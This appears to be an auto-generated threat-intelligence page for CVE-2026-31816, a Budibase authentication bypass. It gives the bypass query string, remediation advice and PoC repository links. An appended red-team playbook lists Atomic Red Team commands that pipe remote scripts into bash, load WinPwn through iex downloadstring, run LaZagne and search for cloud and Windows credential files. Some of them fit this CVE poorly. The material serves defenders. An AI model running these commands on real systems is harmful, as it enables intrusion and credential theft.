CVE-2026-31816
Overview
This vulnerability is an authentication bypass caused by improper input validation in the Budibase server's authorized() middleware. The root cause lies in the use of an unanchored regular expression within the isWebhookEndpoint() function, which matches on the full request URL including query parameters. This flaw affects the server-side API endpoint protection mechanism in Budibase versions 3.31.4 and earlier, allowing unauthorized access by exploiting webhook path pattern matching in the query string.
Vulnerability Description
Budibase is a low code platform for creating internal tools, workflows, and admin panels. In 3.31.4 and earlier, the Budibase server's authorized() middleware that protects every server-side API endpoint can be completely bypassed by appending a webhook path pattern to the query string of any request. The isWebhookEndpoint() function uses an unanchored regex that tests against ctx.request.url, which in Koa includes the full URL with query parameters. When the regex matches, the authorized() middleware immediately calls return next(), skipping all authentication, authorization, role checks, and CSRF protection. This means a completely unauthenticated, remote attacker can access any server-side API endpoint by simply appending ?/webhooks/trigger (or any webhook pattern variant) to the URL.
Impact
An unauthenticated remote attacker can bypass all authentication and authorization controls by appending a webhook path pattern to the query string of any API request, gaining unrestricted access to server-side endpoints. No user interaction or privileges are required, and the attack can be performed over the network. This enables unauthorized data access and manipulation within the Budibase platform, compromising confidentiality and integrity. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the vulnerability requires no authentication and is easily exploitable remotely.
Solution
Budibase has addressed this issue in versions later than 3.31.4 by correcting the regex anchoring in the isWebhookEndpoint() function to properly validate request URLs. Users should upgrade to the latest Budibase release as detailed in the official security advisory at https://github.com/Budibase/budibase/security/advisories/GHSA-gw94-hprh-4wj8. No alternative workarounds are recommended; applying the vendor-provided patch is necessary to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Budibase low-code platform arises from a flaw in the server's authorization middleware, specifically within the isWebhookEndpoint() function. This function employs an unanchored regular expression to evaluate the full URL, including query parameters, which allows for a critical bypass of the authorized() middleware. When an attacker appends a webhook path pattern to the query string, the middleware erroneously interprets this as a valid request, leading to the immediate execution of return next() without performing necessary checks for authentication, authorization, role validation, or CSRF protection. Consequently, this flaw creates a significant security gap, enabling unauthorized access to sensitive server-side API endpoints.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could craft a malicious request to any API endpoint of the Budibase server, appending a webhook trigger pattern to the URL. For instance, by submitting a request such as "http://example.com/api/endpoint?/webhooks/trigger", the attacker can bypass all security measures and gain access to potentially sensitive data or functionalities. This exploitation is particularly concerning as it does not require any authentication, making it accessible to any remote attacker with knowledge of the affected system. The simplicity of this attack vector increases the likelihood of exploitation, especially in environments where Budibase is deployed without stringent network security measures.
The real-world impact of this vulnerability is profound, particularly for organizations relying on Budibase to manage internal tools and workflows. The ability for an unauthorized user to access any server-side API endpoint poses significant business risks, including data breaches, unauthorized data manipulation, and potential disruptions to business operations. Sensitive information could be exposed, leading to compliance violations and reputational damage. Furthermore, the ease of exploitation could result in widespread attacks, particularly against organizations that may not have robust security postures or are unaware of the vulnerability's existence.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to update the Budibase platform to the latest version where this vulnerability has been addressed. Regular patch management practices should be enforced to ensure that all software components are up-to-date. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any potential vulnerabilities within their systems. Implementing web application firewalls (WAFs) can also provide an additional layer of protection by filtering and monitoring HTTP requests to detect and block malicious patterns. Finally, enhancing logging and monitoring capabilities will allow organizations to detect unusual access patterns or unauthorized API calls, enabling a swift response to potential exploitation attempts.
In conclusion, the vulnerability within the Budibase platform presents a serious threat due to its potential for unauthorized access to critical server-side functionalities. The ease of exploitation and the significant impact on business operations underscore the importance of proactive security measures. Organizations must prioritize timely updates, rigorous security assessments, and enhanced monitoring to safeguard their systems against such vulnerabilities. By adopting a comprehensive approach to security, businesses can mitigate the risks associated with this vulnerability and protect their sensitive data and operational integrity.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2026-31816, reflecting a doubling in the likelihood of exploitation attempts. Despite this rise, our telemetry indicates a significant reduction in detection activity, suggesting that adversaries may be refining their tactics to evade existing detection mechanisms or shifting focus to stealthier exploitation methods. The availability of new proof-of-concept exploits on public repositories further lowers the barrier for threat actors to weaponize this vulnerability. This divergence between increased exploitation potential and decreased observable activity complicates defenders’ ability to anticipate and respond to attacks. Consequently, the risk posture associated with this vulnerability has intensified, elevating it to a more urgent threat level. Organizations relying on Budibase should be aware that while direct detection signals may be subdued, the underlying exploitation risk is growing, underscoring the need for heightened vigilance in monitoring and threat hunting.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Budibase | Budibase | All |
cpe:2.3:a:budibase:budibase:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
K3ysTr0K3R/CVE-2026-31816
CVE-2026-31816 - Budibase Authentication Bypass to RCE
|
K3ysTr0K3R | 2 | 0 | 2026-08-14 | View |
|
imjdl/CVE-2026-31816-rshell
CVE-2026-31816 - Budibase Reverse Shell Exploit
|
imjdl | 0 | 0 | 2026-03-12 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-31816 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/Budibase/budibase/security/advisories/GHSA-gw94-hprh-4wj8 |